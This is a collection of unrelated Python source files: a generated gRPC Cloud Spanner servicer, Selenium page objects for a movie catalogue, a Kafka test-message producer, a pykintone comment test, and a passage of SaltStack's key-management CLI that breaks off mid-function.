        self.BeginTransaction = channel.unary_unary(
            "/google.spanner.v1.Spanner/BeginTransaction",
            request_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.BeginTransactionRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_transaction__pb2.Transaction.FromString,
        )
        self.Commit = channel.unary_unary(
            "/google.spanner.v1.Spanner/Commit",
            request_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.CommitRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.CommitResponse.FromString,
        )
        self.Rollback = channel.unary_unary(
            "/google.spanner.v1.Spanner/Rollback",
            request_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.RollbackRequest.SerializeToString,
            response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
        )
        self.PartitionQuery = channel.unary_unary(
            "/google.spanner.v1.Spanner/PartitionQuery",
            request_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.PartitionQueryRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.PartitionResponse.FromString,
        )
        self.PartitionRead = channel.unary_unary(
            "/google.spanner.v1.Spanner/PartitionRead",
            request_serializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.PartitionReadRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2.PartitionResponse.FromString,
        )


class SpannerServicer(object):
    """Cloud Spanner API

  The Cloud Spanner API can be used to manage sessions and execute
  transactions on data stored in Cloud Spanner databases.
  """

    # NOTE(review): generated by the gRPC Python protocol compiler (see the
    # file header) — do not hand-edit; regenerate from spanner.proto.
    # Subclass and override these methods to implement the service; each
    # base method responds UNIMPLEMENTED.

    def CreateSession(self, request, context):
        """Creates a new session. A session can be used to perform
    transactions that read and/or modify data in a Cloud Spanner database.
    Sessions are meant to be reused for many consecutive
    transactions.

    Sessions can only execute one transaction at a time. To execute
    multiple concurrent read-write/write-only transactions, create
    multiple sessions. Note that standalone reads and queries use a
    transaction internally, and count toward the one transaction
    limit.

    Active sessions use additional server resources, so it is a good idea to
    delete idle and unneeded sessions.
    Aside from explicit deletes, Cloud Spanner can delete sessions for which no
    operations are sent for more than an hour. If a session is deleted,
    requests to it return `NOT_FOUND`.

    Idle sessions can be kept alive by sending a trivial SQL query
    periodically, e.g., `"SELECT 1"`.
    """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details("Method not implemented!")
        raise NotImplementedError("Method not implemented!")

    def BatchCreateSessions(self, request, context):
        """Creates multiple new sessions.

    This API can be used to initialize a session cache on the clients.
    See https://goo.gl/TgSFN2 for best practices on session cache management.
    """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details("Method not implemented!")
        raise NotImplementedError("Method not implemented!")

    def GetSession(self, request, context):
        """Gets a session. Returns `NOT_FOUND` if the session does not exist.
    This is mainly useful for determining whether a session is still
    alive.
    """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details("Method not implemented!")
        raise NotImplementedError("Method not implemented!")

    def ListSessions(self, request, context):
        """Lists all sessions in a given database.
    """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details("Method not implemented!")
        raise NotImplementedError("Method not implemented!")

    def DeleteSession(self, request, context):
        """Ends a session, releasing server resources associated with it. This will
    asynchronously trigger cancellation of any operations that are running with
    this session.
    """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details("Method not implemented!")
        raise NotImplementedError("Method not implemented!")

    def ExecuteSql(self, request, context):
        """Executes an SQL statement, returning all results in a single reply. This
    method cannot be used to return a result set larger than 10 MiB;
    if the query yields more data than that, the query fails with
    a `FAILED_PRECONDITION` error.

    Operations inside read-write transactions might return `ABORTED`. If
    this occurs, the application should restart the transaction from
    the beginning. See [Transaction][google.spanner.v1.Transaction] for more details.

    Larger result sets can be fetched in streaming fashion by calling
    [ExecuteStreamingSql][google.spanner.v1.Spanner.ExecuteStreamingSql] instead.
    """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details("Method not implemented!")
        raise NotImplementedError("Method not implemented!")

    def ExecuteStreamingSql(self, request, context):
        """Like [ExecuteSql][google.spanner.v1.Spanner.ExecuteSql], except returns the result
    set as a stream. Unlike [ExecuteSql][google.spanner.v1.Spanner.ExecuteSql], there
    is no limit on the size of the returned result set. However, no
    individual row in the result set can exceed 100 MiB, and no
    column value can exceed 10 MiB.
    """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details("Method not implemented!")
        raise NotImplementedError("Method not implemented!")

    def ExecuteBatchDml(self, request, context):
        """Executes a batch of SQL DML statements. This method allows many statements
    to be run with lower latency than submitting them sequentially with
    [ExecuteSql][google.spanner.v1.Spanner.ExecuteSql].

    Statements are executed in sequential order. A request can succeed even if
    a statement fails. The [ExecuteBatchDmlResponse.status][google.spanner.v1.ExecuteBatchDmlResponse.status] field in the
    response provides information about the statement that failed. Clients must
    inspect this field to determine whether an error occurred.

    Execution stops after the first failed statement; the remaining statements
    are not executed.
    """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details("Method not implemented!")
        raise NotImplementedError("Method not implemented!")

    def Read(self, request, context):
        """Reads rows from the database using key lookups and scans, as a
    simple key/value style alternative to
    [ExecuteSql][google.spanner.v1.Spanner.ExecuteSql].  This method cannot be used to
    return a result set larger than 10 MiB; if the read matches more
    data than that, the read fails with a `FAILED_PRECONDITION`
    error.

    Reads inside read-write transactions might return `ABORTED`. If
    this occurs, the application should restart the transaction from
    the beginning. See [Transaction][google.spanner.v1.Transaction] for more details.

    Larger result sets can be yielded in streaming fashion by calling
    [StreamingRead][google.spanner.v1.Spanner.StreamingRead] instead.
    """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details("Method not implemented!")
        raise NotImplementedError("Method not implemented!")

    def StreamingRead(self, request, context):
        """Like [Read][google.spanner.v1.Spanner.Read], except returns the result set as a
    stream. Unlike [Read][google.spanner.v1.Spanner.Read], there is no limit on the
    size of the returned result set. However, no individual row in
    the result set can exceed 100 MiB, and no column value can exceed
    10 MiB.
    """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details("Method not implemented!")
        raise NotImplementedError("Method not implemented!")

    def BeginTransaction(self, request, context):
        """Begins a new transaction. This step can often be skipped:
    [Read][google.spanner.v1.Spanner.Read], [ExecuteSql][google.spanner.v1.Spanner.ExecuteSql] and
    [Commit][google.spanner.v1.Spanner.Commit] can begin a new transaction as a
    side-effect.
    """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details("Method not implemented!")
        raise NotImplementedError("Method not implemented!")

    def Commit(self, request, context):
        """Commits a transaction. The request includes the mutations to be
    applied to rows in the database.

    `Commit` might return an `ABORTED` error. This can occur at any time;
    commonly, the cause is conflicts with concurrent
    transactions. However, it can also happen for a variety of other
    reasons. If `Commit` returns `ABORTED`, the caller should re-attempt
    the transaction from the beginning, re-using the same session.
    """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details("Method not implemented!")
        raise NotImplementedError("Method not implemented!")

    def Rollback(self, request, context):
        """Rolls back a transaction, releasing any locks it holds. It is a good
    idea to call this for any transaction that includes one or more
    [Read][google.spanner.v1.Spanner.Read] or [ExecuteSql][google.spanner.v1.Spanner.ExecuteSql] requests and
    ultimately decides not to commit.

    `Rollback` returns `OK` if it successfully aborts the transaction, the
    transaction was already aborted, or the transaction is not
    found. `Rollback` never returns `ABORTED`.
    """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details("Method not implemented!")
        raise NotImplementedError("Method not implemented!")

    def PartitionQuery(self, request, context):
        """Creates a set of partition tokens that can be used to execute a query
    operation in parallel.  Each of the returned partition tokens can be used
    by [ExecuteStreamingSql][google.spanner.v1.Spanner.ExecuteStreamingSql] to specify a subset
    of the query result to read.  The same session and read-only transaction
    must be used by the PartitionQueryRequest used to create the
    partition tokens and the ExecuteSqlRequests that use the partition tokens.

    Partition tokens become invalid when the session used to create them
    is deleted, is idle for too long, begins a new transaction, or becomes too
    old.  When any of these happen, it is not possible to resume the query, and
    the whole operation must be restarted from the beginning.
    """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details("Method not implemented!")
        raise NotImplementedError("Method not implemented!")

    def PartitionRead(self, request, context):
        """Creates a set of partition tokens that can be used to execute a read
    operation in parallel.  Each of the returned partition tokens can be used
    by [StreamingRead][google.spanner.v1.Spanner.StreamingRead] to specify a subset of the read
    result to read.  The same session and read-only transaction must be used by
    the PartitionReadRequest used to create the partition tokens and the
    ReadRequests that use the partition tokens.  There are no ordering
    guarantees on rows returned among the returned partition tokens, or even
    within each individual StreamingRead call issued with a partition_token.

    Partition tokens become invalid when the session used to create them
    is deleted, is idle for too long, begins a new transaction, or becomes too
    old.  When any of these happen, it is not possible to resume the read, and
    the whole operation must be restarted from the beginning.
    """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details("Method not implemented!")
        raise NotImplementedError("Method not implemented!")


def add_SpannerServicer_to_server(servicer, server):
    """Register the Spanner servicer's RPC method handlers with *server*.

    Builds one handler per RPC from a declarative table and installs them
    under the fully-qualified service name ``google.spanner.v1.Spanner``.
    """
    # Short aliases for the generated protobuf modules.
    _spanner = google_dot_cloud_dot_spanner__v1_dot_proto_dot_spanner__pb2
    _result_set = google_dot_cloud_dot_spanner__v1_dot_proto_dot_result__set__pb2
    _transaction = google_dot_cloud_dot_spanner__v1_dot_proto_dot_transaction__pb2
    _empty = google_dot_protobuf_dot_empty__pb2

    # (method name, handler factory, request message, response message)
    _method_specs = (
        ("CreateSession", grpc.unary_unary_rpc_method_handler,
         _spanner.CreateSessionRequest, _spanner.Session),
        ("BatchCreateSessions", grpc.unary_unary_rpc_method_handler,
         _spanner.BatchCreateSessionsRequest, _spanner.BatchCreateSessionsResponse),
        ("GetSession", grpc.unary_unary_rpc_method_handler,
         _spanner.GetSessionRequest, _spanner.Session),
        ("ListSessions", grpc.unary_unary_rpc_method_handler,
         _spanner.ListSessionsRequest, _spanner.ListSessionsResponse),
        ("DeleteSession", grpc.unary_unary_rpc_method_handler,
         _spanner.DeleteSessionRequest, _empty.Empty),
        ("ExecuteSql", grpc.unary_unary_rpc_method_handler,
         _spanner.ExecuteSqlRequest, _result_set.ResultSet),
        ("ExecuteStreamingSql", grpc.unary_stream_rpc_method_handler,
         _spanner.ExecuteSqlRequest, _result_set.PartialResultSet),
        ("ExecuteBatchDml", grpc.unary_unary_rpc_method_handler,
         _spanner.ExecuteBatchDmlRequest, _spanner.ExecuteBatchDmlResponse),
        ("Read", grpc.unary_unary_rpc_method_handler,
         _spanner.ReadRequest, _result_set.ResultSet),
        ("StreamingRead", grpc.unary_stream_rpc_method_handler,
         _spanner.ReadRequest, _result_set.PartialResultSet),
        ("BeginTransaction", grpc.unary_unary_rpc_method_handler,
         _spanner.BeginTransactionRequest, _transaction.Transaction),
        ("Commit", grpc.unary_unary_rpc_method_handler,
         _spanner.CommitRequest, _spanner.CommitResponse),
        ("Rollback", grpc.unary_unary_rpc_method_handler,
         _spanner.RollbackRequest, _empty.Empty),
        ("PartitionQuery", grpc.unary_unary_rpc_method_handler,
         _spanner.PartitionQueryRequest, _spanner.PartitionResponse),
        ("PartitionRead", grpc.unary_unary_rpc_method_handler,
         _spanner.PartitionReadRequest, _spanner.PartitionResponse),
    )
    rpc_method_handlers = {
        name: factory(
            getattr(servicer, name),
            request_deserializer=request_cls.FromString,
            response_serializer=response_cls.SerializeToString,
        )
        for name, factory, request_cls, response_cls in _method_specs
    }
    generic_handler = grpc.method_handlers_generic_handler(
        "google.spanner.v1.Spanner", rpc_method_handlers
    )
    server.add_generic_rpc_handlers((generic_handler,))

# -*- coding: utf-8 -*-

import allure
from selenium.webdriver.common.by import By

from .base import BasePage
from .elements import SimpleInput, SimpleText
from .blocks.nav import NavBlock


class BrowseMoviePageLocators(object):
    """Locators for the movie details (browse) page."""

    TITLE_LOCATOR = (By.CSS_SELECTOR, '#movie h2')
    COUNTRY_LOCATOR = (By.NAME, 'country')
    DIRECTOR_LOCATOR = (By.NAME, 'director')
    WRITER_LOCATOR = (By.NAME, 'writer')
    PRODUCER_LOCATOR = (By.NAME, 'producer')
    EDIT_BUTTON_LOCATOR = (By.CSS_SELECTOR, 'img[title="Edit"]')
    REMOVE_BUTTON_LOCATOR = (By.CSS_SELECTOR, 'img[title="Remove"]')


class BrowseMoviePage(BasePage):
    """Movie details (browse) page."""

    def __init__(self, driver):
        super(BrowseMoviePage, self).__init__(driver)
        self.nav = NavBlock(driver)

    # Read-only text elements displayed on the page.
    title = SimpleText(BrowseMoviePageLocators.TITLE_LOCATOR)
    director = SimpleText(BrowseMoviePageLocators.DIRECTOR_LOCATOR)
    writer = SimpleText(BrowseMoviePageLocators.WRITER_LOCATOR)
    producer = SimpleText(BrowseMoviePageLocators.PRODUCER_LOCATOR)

    @allure.step('Нажмем на кнопку "Edit"')  # fixed typo: "кноку" -> "кнопку"
    def click_edit_button(self):
        """Click the "Edit" button and open the edit-movie page.

        :rtype: EditMoviePage
        """
        self._click(BrowseMoviePageLocators.EDIT_BUTTON_LOCATOR)
        return EditMoviePage(self._driver)

    @allure.step('Нажмем на кнопку "Remove"')  # fixed typo: "кноку" -> "кнопку"
    def click_remove_button(self):
        """Click "Remove", accept the confirmation alert and return home.

        :rtype: HomePage
        """
        self._click(BrowseMoviePageLocators.REMOVE_BUTTON_LOCATOR)
        self.alert_accept()
        # Imported locally, presumably to avoid a circular import with
        # home.py — confirm before moving to module level.
        from .home import HomePage
        return HomePage(self._driver)


class AddMoviePageLocators(object):
    """Locators for the movie creation (add) page."""

    TITLE_INPUT_LOCATOR = (By.NAME, 'name')
    TITLE_INPUT_ERROR_LOCATOR = (By.CSS_SELECTOR, 'input[name="name"].error')
    ALSO_KNOWN_AS_INPUT_LOCATOR = (By.NAME, 'aka')
    YEAR_INPUT_LOCATOR = (By.NAME, 'year')
    YEAR_INPUT_ERROR_LOCATOR = (By.CSS_SELECTOR, 'input[name="year"].error')
    DURATION_INPUT_LOCATOR = (By.NAME, 'duration')
    TRAILER_URL_INPUT_LOCATOR = (By.NAME, 'trailer')
    FORMAT_INPUT_LOCATOR = (By.NAME, 'format')
    COUNTRY_INPUT_LOCATOR = (By.NAME, 'country')
    DIRECTOR_INPUT_LOCATOR = (By.NAME, 'director')
    WRITER_INPUT_LOCATOR = (By.NAME, 'writer')
    PRODUCER_INPUT_LOCATOR = (By.NAME, 'producer')
    SAVE_BUTTON_LOCATOR = (By.CSS_SELECTOR, 'img[title="Save"]')


class AddMoviePage(BasePage):
    """Movie creation (add) page."""

    def __init__(self, driver):
        super(AddMoviePage, self).__init__(driver)
        self.nav = NavBlock(driver)

    # Form inputs; the second SimpleInput argument is the human-readable
    # field description (in Russian) used in step reporting.
    title = SimpleInput(AddMoviePageLocators.TITLE_INPUT_LOCATOR, 'название фильма')
    # NOTE(review): "also_know_as" is a typo for "also_known_as", but it is a
    # public attribute used by callers, so the name is kept.
    also_know_as = SimpleInput(AddMoviePageLocators.ALSO_KNOWN_AS_INPUT_LOCATOR, 'оригинальное название фильма')
    year = SimpleInput(AddMoviePageLocators.YEAR_INPUT_LOCATOR, 'год')
    duration = SimpleInput(AddMoviePageLocators.DURATION_INPUT_LOCATOR, 'продолжительность')
    trailer_url = SimpleInput(AddMoviePageLocators.TRAILER_URL_INPUT_LOCATOR, 'адрес трейлера')
    # NOTE(review): "format" shadows the builtin, but it is part of the page's
    # public interface; kept for backward compatibility.
    format = SimpleInput(AddMoviePageLocators.FORMAT_INPUT_LOCATOR, 'формат')
    country = SimpleInput(AddMoviePageLocators.COUNTRY_INPUT_LOCATOR, 'страну')
    director = SimpleInput(AddMoviePageLocators.DIRECTOR_INPUT_LOCATOR, 'директора')
    writer = SimpleInput(AddMoviePageLocators.WRITER_INPUT_LOCATOR, 'сценариста')
    producer = SimpleInput(AddMoviePageLocators.PRODUCER_INPUT_LOCATOR, 'продюсера')

    @allure.step('Нажмем на кнопку "Save"')  # fixed typo: "кноку" -> "кнопку"
    def click_save_button(self):
        """Click "Save" and open the created movie's browse page.

        :rtype: BrowseMoviePage
        """
        self._click(AddMoviePageLocators.SAVE_BUTTON_LOCATOR)
        return BrowseMoviePage(self._driver)

    def title_field_is_required_present(self):
        """Return True when the "title" validation error is displayed.

        :rtype: bool
        """
        return self._is_element_present(AddMoviePageLocators.TITLE_INPUT_ERROR_LOCATOR)

    def year_field_is_required_present(self):
        """Return True when the "year" validation error is displayed.

        :rtype: bool
        """
        return self._is_element_present(AddMoviePageLocators.YEAR_INPUT_ERROR_LOCATOR)


class EditMoviePageLocators(object):
    """Locators for the movie editing page."""

    REMOVE_BUTTON_LOCATOR = (By.CSS_SELECTOR, 'img[title="Remove"]')


class EditMoviePage(AddMoviePage):
    """Movie editing page; inherits the form fields from AddMoviePage."""

    @allure.step('Нажмем на кнопку "Remove"')  # fixed typo: "кноку" -> "кнопку"
    def click_remove_button(self):
        """Click "Remove", accept the confirmation alert and return home.

        :rtype: HomePage
        """
        self._click(EditMoviePageLocators.REMOVE_BUTTON_LOCATOR)
        self.alert_accept()
        # Imported locally, presumably to avoid a circular import with
        # home.py — confirm before moving to module level.
        from .home import HomePage
        return HomePage(self._driver)

"""
 Copyright 2015-2018 IBM

 Licensed under the Apache License, Version 2.0 (the "License");
 you may not use this file except in compliance with the License.
 You may obtain a copy of the License at

 http://www.apache.org/licenses/LICENSE-2.0

 Unless required by applicable law or agreed to in writing, software
 distributed under the License is distributed on an "AS IS" BASIS,
 WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 See the License for the specific language governing permissions and
 limitations under the License.

 Licensed Materials - Property of IBM
 © Copyright IBM Corp. 2015-2018
"""
import asyncio
from confluent_kafka import Producer

class ProducerTask(object):
    """Produces numbered test messages to a Kafka topic until stopped."""

    def __init__(self, conf, topic_name):
        # conf: configuration dict passed straight to confluent_kafka.Producer
        self.topic_name = topic_name
        self.producer = Producer(conf)
        # Sequence number embedded in each message body.
        self.counter = 0
        # Cleared by stop() to make the run() loop exit.
        self.running = True

    def stop(self):
        """Ask the run() loop to exit after its current iteration."""
        self.running = False

    def on_delivery(self, err, msg):
        """Delivery callback invoked by the producer during poll()/flush()."""
        if err:
            print('Delivery report: Failed sending message {0}'.format(msg.value()))
            print(err)
            # We could retry sending the message
        else:
            print('Message produced, offset: {0}'.format(msg.offset()))

    # NOTE(review): generator-based coroutines (@asyncio.coroutine/yield from)
    # are deprecated and removed in Python 3.11; migrating to async def/await
    # changes the coroutine object type callers receive — confirm before changing.
    @asyncio.coroutine
    def run(self):
        """Produce one message every few seconds until stop() is called."""
        print('The producer has started')
        while self.running:
            message = 'This is a test message #{0}'.format(self.counter)
            key = 'key'
            sleep = 2 # Short sleep for flow control
            try:
                # partition argument is -1 (unassigned) — presumably lets the
                # configured partitioner pick the partition; confirm.
                self.producer.produce(self.topic_name, message, key, -1, self.on_delivery)
                self.producer.poll(0)
                self.counter += 1
            except Exception as err:
                print('Failed sending message {0}'.format(message))
                print(err)
                sleep = 5 # Longer sleep before retrying
            yield from asyncio.sleep(sleep) 
        # Drain any outstanding deliveries before finishing.
        self.producer.flush()


# -*- coding: utf-8 -*-
import unittest
import pykintone
from pykintone.model import kintoneModel
import tests.envs as envs


class TestAppModelSimple(kintoneModel):
    # Minimal kintone record model used by the comment test below.

    def __init__(self):
        super(TestAppModelSimple, self).__init__()
        self.my_key = ""  # key field used to identify the test record
        self.stringField = ""  # plain text field


class TestComment(unittest.TestCase):
    """Integration test for kintone record comments: create, select, delete."""

    def test_comment(self):
        app = pykintone.load(envs.FILE_PATH).app()

        # Create a record to attach comments to.
        model = TestAppModelSimple()
        model.my_key = "comment_test"
        model.stringField = "comment_test_now"

        result = app.create(model)
        self.assertTrue(result.ok)  # confirm create the record to test comment
        _record_id = result.record_id

        # create comment
        r_created = app.comment(_record_id).create("コメントのテスト")
        self.assertTrue(r_created.ok)
        # it requires Administrator user is registered in kintone
        r_created_m = app.comment(_record_id).create("メンションのテスト", [("Administrator", "USER")])
        self.assertTrue(r_created_m.ok)

        # select comment
        r_selected = app.comment(_record_id).select(True, 0, 10)
        self.assertTrue(r_selected.ok)
        # Was assertTrue(2, len(...)), which always passes because the second
        # argument is only the failure message; assertEqual actually verifies.
        self.assertEqual(2, len(r_selected.raw_comments))
        comments = r_selected.comments()
        self.assertEqual(1, len(comments[-1].mentions))

        # delete comment
        for c in comments:
            r_deleted = app.comment(_record_id).delete(c.comment_id)
            self.assertTrue(r_deleted.ok)
        r_selected = app.comment(_record_id).select()
        self.assertEqual(0, len(r_selected.raw_comments))

        # done test: remove the record created for this test
        app.delete(_record_id)

# -*- coding: utf-8 -*-
'''
The Salt Key backend API and interface used by the CLI. The Key class can be
used to manage salt keys directly without interfacing with the CLI.
'''

# Import python libs
from __future__ import absolute_import, print_function
import os
import copy
import json
import stat
import shutil
import fnmatch
import hashlib
import logging

# Import salt libs
import salt.crypt
import salt.utils
import salt.exceptions
import salt.utils.event
import salt.daemons.masterapi
from salt.utils import kinds
from salt.utils.event import tagify

# Import third party libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
import salt.ext.six as six
from salt.ext.six.moves import input
# pylint: enable=import-error,no-name-in-module,redefined-builtin
try:
    import msgpack
except ImportError:
    pass

log = logging.getLogger(__name__)


def get_key(opts):
    '''
    Return the key backend that matches the configured transport:
    ``Key`` for zeromq/tcp, ``RaetKey`` otherwise.
    '''
    if opts['transport'] in ('zeromq', 'tcp'):
        return Key(opts)
    return RaetKey(opts)


class KeyCLI(object):
    '''
    Manage key CLI operations
    '''
    def __init__(self, opts):
        self.opts = opts
        # Pick the key backend that matches the configured transport.
        if self.opts['transport'] in ('zeromq', 'tcp'):
            self.key = Key(opts)
        else:
            self.key = RaetKey(opts)

    def list_status(self, status):
        '''
        Print out the keys under a named status

        :param str status: A string indicating which set of keys to return
        '''
        keys = self.key.list_keys()
        # Prefix matching lets abbreviations like 'acc', 'pre', 'rej' work.
        if status.startswith('acc'):
            salt.output.display_output(
                {self.key.ACC: keys[self.key.ACC]},
                'key',
                self.opts
            )
        elif status.startswith(('pre', 'un')):
            salt.output.display_output(
                {self.key.PEND: keys[self.key.PEND]},
                'key',
                self.opts
            )
        elif status.startswith('rej'):
            salt.output.display_output(
                {self.key.REJ: keys[self.key.REJ]},
                'key',
                self.opts
            )
        elif status.startswith('den'):
            # Denied keys only exist for backends whose DEN attribute is set.
            if self.key.DEN:
                salt.output.display_output(
                    {self.key.DEN: keys[self.key.DEN]},
                    'key',
                    self.opts
                )
        elif status.startswith('all'):
            self.list_all()

    def list_all(self):
        '''
        Print out all keys
        '''
        salt.output.display_output(
                self.key.list_keys(),
                'key',
                self.opts)

    def accept(self, match, include_rejected=False):
        '''
        Accept the keys matched

        :param str match: A string to match against. i.e. 'web*'
        :param bool include_rejected: Whether or not to accept a matched key that was formerly rejected
        '''
        # Print each key that moved into the accepted set as a result of
        # this call (present after the call but not before it).
        def _print_accepted(matches, after_match):
            if self.key.ACC in after_match:
                accepted = sorted(
                    set(after_match[self.key.ACC]).difference(
                        set(matches.get(self.key.ACC, []))
                    )
                )
                for key in accepted:
                    print('Key for minion {0} accepted.'.format(key))

        matches = self.key.name_match(match)
        # Only pending (and optionally rejected) keys are eligible.
        keys = {}
        if self.key.PEND in matches:
            keys[self.key.PEND] = matches[self.key.PEND]
        if include_rejected and bool(matches.get(self.key.REJ)):
            keys[self.key.REJ] = matches[self.key.REJ]
        if not keys:
            msg = (
                'The key glob {0!r} does not match any unaccepted {1}keys.'
                .format(match, 'or rejected ' if include_rejected else '')
            )
            print(msg)
            raise salt.exceptions.SaltSystemExit(code=1)
        # Prompt for confirmation unless --yes was supplied.
        if not self.opts.get('yes', False):
            print('The following keys are going to be accepted:')
            salt.output.display_output(
                    keys,
                    'key',
                    self.opts)
            try:
                veri = input('Proceed? [n/Y] ')
            except KeyboardInterrupt:
                raise SystemExit("\nExiting on CTRL-c")
            # Empty answer defaults to yes, per the [n/Y] prompt.
            if not veri or veri.lower().startswith('y'):
                _print_accepted(
                    matches,
                    self.key.accept(
                        match_dict=keys,
                        include_rejected=include_rejected
                    )
                )
        else:
            print('The following keys are going to be accepted:')
            salt.output.display_output(
                    keys,
                    'key',
                    self.opts)
            _print_accepted(
                matches,
                self.key.accept(
                    match_dict=keys,
                    include_rejected=include_rejected
                )
            )

    def accept_all(self, include_rejected=False):
        '''
        Accept all keys

        :param bool include_rejected: Whether or not to accept a matched key that was formerly rejected
        '''
        self.accept('*', include_rejected=include_rejected)

    def delete(self, match):
        '''
        Delete the matched keys

        :param str match: A string to match against. i.e. 'web*'
        '''
        # Print each key that disappeared from any status dir as a result
        # of this call (present before the call but not after it).
        def _print_deleted(matches, after_match):
            deleted = []
            for keydir in (self.key.ACC, self.key.PEND, self.key.REJ):
                deleted.extend(list(
                    set(matches.get(keydir, [])).difference(
                        set(after_match.get(keydir, []))
                    )
                ))
            for key in sorted(deleted):
                print('Key for minion {0} deleted.'.format(key))

        matches = self.key.name_match(match)
        if not matches:
            print(
                'The key glob {0!r} does not match any accepted, unaccepted '
                'or rejected keys.'.format(match)
            )
            raise salt.exceptions.SaltSystemExit(code=1)
        if not self.opts.get('yes', False):
            print('The following keys are going to be deleted:')
            salt.output.display_output(
                    matches,
                    'key',
                    self.opts)
            try:
                veri = input('Proceed? [N/y] ')
            except KeyboardInterrupt:
                raise SystemExit("\nExiting on CTRL-c")
            # Deletion defaults to no — an explicit 'y' is required.
            if veri.lower().startswith('y'):
                _print_deleted(
                    matches,
                    self.key.delete_key(match_dict=matches)
                )
        else:
            print('Deleting the following keys:')
            salt.output.display_output(
                    matches,
                    'key',
                    self.opts)
            _print_deleted(
                matches,
                self.key.delete_key(match_dict=matches)
            )

    def delete_all(self):
        '''
        Delete all keys
        '''
        self.delete('*')

    def reject(self, match, include_accepted=False):
        '''
        Reject the matched keys

        :param str match: A string to match against. i.e. 'web*'
        :param bool include_accepted: Whether or not to accept a matched key that was formerly accepted
        '''
        # Print each key that moved into the rejected set as a result of
        # this call (present after the call but not before it).
        def _print_rejected(matches, after_match):
            if self.key.REJ in after_match:
                rejected = sorted(
                    set(after_match[self.key.REJ]).difference(
                        set(matches.get(self.key.REJ, []))
                    )
                )
                for key in rejected:
                    print('Key for minion {0} rejected.'.format(key))

        matches = self.key.name_match(match)
        keys = {}
        if self.key.PEND in matches:
            keys[self.key.PEND] = matches[self.key.PEND]
        if include_accepted and bool(matches.get(self.key.ACC)):
            keys[self.key.ACC] = matches[self.key.ACC]
        if not keys:
            msg = 'The key glob {0!r} does not match any {1} keys.'.format(
                match,
                'accepted or unaccepted' if include_accepted else 'unaccepted'
            )
            print(msg)
            return
        if not self.opts.get('yes', False):
            print('The following keys are going to be rejected:')
            salt.output.display_output(
                    keys,
                    'key',
                    self.opts)
            veri = input('Proceed? [n/Y] ')
            if veri.lower().startswith('n'):
                return
        # NOTE(review): unlike accept(), the unfiltered 'matches' dict (not
        # the filtered 'keys') is passed through; presumably Key.reject does
        # its own filtering based on include_accepted — confirm.
        _print_rejected(
            matches,
            self.key.reject(
                match_dict=matches,
                include_accepted=include_accepted
            )
        )

    def reject_all(self, include_accepted=False):
        '''
        Reject all keys

        :param bool include_accepted: Whether or not to accept a matched key that was formerly accepted
        '''
        self.reject('*', include_accepted=include_accepted)

    def print_key(self, match):
        '''
        Print out a single key

        :param str match: A string to match against. i.e. 'web*'
        '''
        matches = self.key.key_str(match)
        salt.output.display_output(
                matches,
                'key',
                self.opts)

    def print_all(self):
        '''
        Print out all managed keys
        '''
        self.print_key('*')

    def finger(self, match):
        '''
        Print out the fingerprints for the matched keys

        :param str match: A string to match against. i.e. 'web*'
        '''
        matches = self.key.finger(match)
        salt.output.display_output(
                matches,
                'key',
                self.opts)

    def finger_all(self):
        '''
        Print out all fingerprints
        '''
        matches = self.key.finger('*')
        salt.output.display_output(
                matches,
                'key',
                self.opts)

    def prep_signature(self):
        '''
        Searches for usable keys to create the
        master public-key signature
        '''
        self.privkey = None
        self.pubkey = None

        # check given pub-key
        if self.opts['pub']:
            if not os.path.isfile(self.opts['pub']):
                print('Public-key {0} does not exist'.format(self.opts['pub']))
                return
            self.pubkey = self.opts['pub']

        # default to master.pub
        else:
            mpub = self.opts['pki_dir'] + '/' + 'master.pub'
            if os.path.isfile(mpub):
                self.pubkey = mpub

        # check given priv-key
        if self.opts['priv']:
            if not os.path.isfile(self.opts['priv']):
                print('Private-key {0} does not exist'.format(self.opts['priv']))
                return
            self.privkey = self.opts['priv']

        # default to master_sign.pem
        else:
            mpriv = self.opts['pki_dir'] + '/' + 'master_sign.pem'
            if os.path.isfile(mpriv):
                self.privkey = mpriv

        if not self.privkey:
            # Optionally generate a new signing key-pair when none was found.
            if self.opts['auto_create']:
                print('Generating new signing key-pair {0}.* in {1}'
                      ''.format(self.opts['master_sign_key_name'],
                                self.opts['pki_dir']))
                salt.crypt.gen_keys(self.opts['pki_dir'],
                                    self.opts['master_sign_key_name'],
                                    self.opts['keysize'],
                                    self.opts.get('user'))

                self.privkey = self.opts['pki_dir'] + '/' + self.opts['master_sign_key_name'] + '.pem'
            else:
                print('No usable private-key found')
                return

        if not self.pubkey:
            print('No usable public-key found')
            return

        print('Using public-key {0}'.format(self.pubkey))
        print('Using private-key {0}'.format(self.privkey))

        if self.opts['signature_path']:
